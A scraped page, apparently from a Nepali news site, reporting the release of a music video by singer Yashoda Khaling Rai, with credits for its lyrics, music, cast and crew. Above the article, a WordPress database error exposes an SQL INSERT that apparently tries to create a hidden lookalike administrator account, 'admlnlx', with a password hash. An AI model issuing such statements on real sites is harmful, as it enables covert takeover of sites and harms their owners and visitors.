WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzSHrY7iO19w4O3aUzFUDZ4wwCaRUd1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 17:37:52', '', 'admlnlx', 'admlnlx')
काठमाडाैं- गायिका यशोदा खालिङ रार्इको आवाजमा “आउछौ तिमी सुटुक्कै” सुगम संगीतमा आधारीत गीतको म्यूजिक भिडियो सार्वजनिक भएको छ । गीतमा गीतकार आरजु बिष्ट सल्यानीको शब्द , पबिधन खालिङ रार्इको संगीत, राजन इशानको एरेन्जमेन्ट रहेको छ । जुन गीत ‘यशोदा भाग २’ एल्वममा समावेस छ ।
भिडियोमा ममता राई र रमेश सुनुवारको अभिनय रहेको छ भने कमला राई र मेलिसा राईले उनीहरुलाई साथ दिएका छन् ।
जीवन राइले निर्माण गरेको भिडियामा शम्भु मोक्तान र ओम कर्माचार्यको छायांकन रहेको छ ।
सजबिना लामाको श्रींगार, नबिन निरौलाको रंग संयोजन तथा सम्पादन रहेको भिडियोमा रमेश सुनुवारको कोरियोग्राफी तथा निर्देशन रहेको छ। हेर्नुहोस् भिडियो